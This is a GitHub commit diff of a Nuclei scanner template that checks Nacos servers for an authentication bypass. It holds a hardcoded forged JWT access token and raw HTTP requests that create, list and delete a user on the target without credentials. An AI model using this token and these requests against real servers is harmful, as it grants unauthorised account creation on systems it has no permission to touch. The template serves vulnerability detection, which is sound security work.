Skip to content

Commit 8e05d32

Browse files
authored
Merge pull request #12683 from projectdiscovery/pussycat0x-patch-12
FN Fix nacos-create-user.yaml
2 parents 2859fb6 + cb0ba8c commit 8e05d32

File tree

1 file changed

+5
-6
lines changed

1 file changed

+5
-6
lines changed

http/misconfiguration/nacos/nacos-create-user.yaml

Lines changed: 5 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -18,28 +18,27 @@ info:
1818
shodan-query: title:"Nacos"
1919
tags: misconfig,nacos,unauth,bypass,instrusive
2020

21+
variables:
22+
token: "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g"
23+
2124
http:
2225
- raw:
2326
- |
2427
POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
2528
Host: {{Hostname}}
29+
2630
- |
2731
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
2832
Host: {{Hostname}}
33+
2934
- |
3035
DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
3136
Host: {{Hostname}}
3237
33-
payloads:
34-
token:
35-
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
36-
attack: pitchfork
37-
3838
matchers-condition: and
3939
matchers:
4040
- type: dsl
4141
dsl:
4242
- "status_code_1 == 200 && contains(body_1,'create user ok!')"
4343
- "status_code_3 == 200 && contains(body_3,'delete user ok!')"
4444
condition: and
45-
# digest: 4a0a00473045022100b3970f3b9132eb9453b5492a4f6e332fd7fbe4878f80e2d76e09af9d1483dbdd022065b272b997fd05972f333efac30e4ea18b34ea44a87cdb68f2ddf0f4d3119d5d:922c64590222798bb761d5b6d8e72950

0 commit comments

Comments
 (0)